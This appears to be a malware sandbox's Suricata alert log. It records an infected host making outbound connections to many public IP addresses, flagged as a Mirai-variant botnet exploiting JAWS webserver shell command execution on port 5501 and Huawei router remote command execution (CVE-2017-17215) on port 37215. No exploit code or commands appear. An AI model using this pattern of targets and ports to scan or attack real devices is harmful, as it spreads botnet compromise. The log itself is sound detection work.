              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57340 -> 157.251.244.167:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39226 -> 94.147.93.25:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39226 -> 94.147.93.25:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41292 -> 157.247.228.121:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41292 -> 157.247.228.121:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46242 -> 144.103.158.219:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46242 -> 144.103.158.219:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55176 -> 106.119.26.16:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55176 -> 106.119.26.16:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50788 -> 36.208.171.174:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33634 -> 64.159.55.26:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50676 -> 99.78.204.140:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51108 -> 209.47.138.221:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50788 -> 36.208.171.174:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51108 -> 209.47.138.221:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33634 -> 64.159.55.26:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37294 -> 118.232.62.30:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35616 -> 160.237.248.140:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43446 -> 122.250.210.232:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37294 -> 118.232.62.30:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:43446 -> 122.250.210.232:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35616 -> 160.237.248.140:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50676 -> 99.78.204.140:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53614 -> 219.219.30.91:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46212 -> 62.96.196.84:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53614 -> 219.219.30.91:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46212 -> 62.96.196.84:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60934 -> 90.237.45.91:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60934 -> 90.237.45.91:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44932 -> 77.55.69.4:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46820 -> 115.111.202.27:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59938 -> 141.213.202.48:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46820 -> 115.111.202.27:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40616 -> 93.77.76.166:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59938 -> 141.213.202.48:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:40616 -> 93.77.76.166:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44932 -> 77.55.69.4:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39174 -> 152.100.121.201:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39174 -> 152.100.121.201:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40044 -> 27.79.219.247:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:40044 -> 27.79.219.247:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36618 -> 150.113.165.16:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58688 -> 114.134.25.223:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43780 -> 154.92.145.217:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:58688 -> 114.134.25.223:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35954 -> 60.20.174.172:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:43780 -> 154.92.145.217:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36618 -> 150.113.165.16:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35954 -> 60.20.174.172:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60900 -> 216.67.24.230:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60900 -> 216.67.24.230:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48788 -> 220.88.243.69:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59632 -> 2.212.43.138:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48788 -> 220.88.243.69:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53956 -> 142.11.131.109:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59632 -> 2.212.43.138:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53956 -> 142.11.131.109:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59342 -> 185.79.179.217:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59342 -> 185.79.179.217:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48214 -> 176.101.204.66:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48214 -> 176.101.204.66:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36958 -> 23.217.76.185:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36958 -> 23.217.76.185:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45892 -> 165.253.80.26:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45892 -> 165.253.80.26:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53956 -> 17.240.133.178:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53956 -> 17.240.133.178:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32826 -> 104.93.24.172:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:32826 -> 104.93.24.172:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53862 -> 148.211.229.238:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53862 -> 148.211.229.238:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48894 -> 143.116.107.68:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48894 -> 143.116.107.68:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55794 -> 47.88.154.116:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55794 -> 47.88.154.116:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35354 -> 217.109.131.186:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35354 -> 217.109.131.186:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57336 -> 222.207.27.13:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57336 -> 222.207.27.13:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37036 -> 90.5.134.199:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37036 -> 90.5.134.199:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55998 -> 122.6.43.30:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55998 -> 122.6.43.30:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40764 -> 23.172.41.165:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:40764 -> 23.172.41.165:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46586 -> 197.203.157.68:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40496 -> 156.21.203.56:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51140 -> 182.7.112.193:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51140 -> 182.7.112.193:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45530 -> 41.119.102.11:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45530 -> 41.119.102.11:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56150 -> 100.24.234.219:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60666 -> 168.120.209.33:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56150 -> 100.24.234.219:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60666 -> 168.120.209.33:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60976 -> 197.236.103.214:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60976 -> 197.236.103.214:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49742 -> 148.134.31.113:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32850 -> 209.67.99.182:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52436 -> 208.114.135.255:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:32850 -> 209.67.99.182:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52436 -> 208.114.135.255:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49742 -> 148.134.31.113:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55364 -> 80.186.109.158:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55364 -> 80.186.109.158:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44938 -> 150.238.186.67:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44938 -> 150.238.186.67:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54788 -> 177.9.26.63:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54788 -> 177.9.26.63:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56350 -> 69.155.12.145:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56350 -> 69.155.12.145:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50764 -> 197.220.45.37:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33084 -> 197.243.58.27:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59676 -> 197.44.93.145:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48482 -> 102.155.236.196:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52222 -> 197.64.25.239:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39348 -> 218.223.37.45:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39348 -> 218.223.37.45:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45310 -> 35.47.69.167:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45310 -> 35.47.69.167:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35004 -> 42.24.133.33:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35004 -> 42.24.133.33:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39370 -> 155.25.92.49:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39370 -> 155.25.92.49:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47448 -> 160.89.148.49:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46482 -> 63.242.80.200:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46482 -> 63.242.80.200:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43602 -> 156.88.12.29:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:43602 -> 156.88.12.29:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57498 -> 185.42.85.133:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57656 -> 167.220.127.47:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44972 -> 138.108.78.144:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57656 -> 167.220.127.47:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57498 -> 185.42.85.133:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44972 -> 138.108.78.144:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38414 -> 208.75.58.43:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38414 -> 208.75.58.43:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51406 -> 168.64.76.251:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51406 -> 168.64.76.251:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51354 -> 197.56.233.139:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41014 -> 134.66.130.211:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41014 -> 134.66.130.211:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37060 -> 157.175.0.209:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49186 -> 156.225.76.159:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41554 -> 156.161.190.189:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39562 -> 138.102.61.33:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50938 -> 135.80.121.164:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39562 -> 138.102.61.33:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50938 -> 135.80.121.164:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43168 -> 92.9.8.175:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:43168 -> 92.9.8.175:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33268 -> 180.221.147.64:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33268 -> 180.221.147.64:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41388 -> 57.214.100.63:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41388 -> 57.214.100.63:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57766 -> 144.69.147.165:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57766 -> 144.69.147.165:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42528 -> 102.87.229.68:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39046 -> 186.92.111.49:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38590 -> 222.53.105.142:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38590 -> 222.53.105.142:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42162 -> 136.135.157.231:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42162 -> 136.135.157.231:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43866 -> 201.196.74.154:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:43866 -> 201.196.74.154:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48880 -> 87.32.114.219:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48880 -> 87.32.114.219:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39600 -> 193.86.37.101:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54464 -> 107.95.233.22:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39600 -> 193.86.37.101:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54464 -> 107.95.233.22:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46750 -> 153.229.43.236:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46750 -> 153.229.43.236:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46314 -> 157.235.15.74:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37560 -> 160.21.215.135:37215
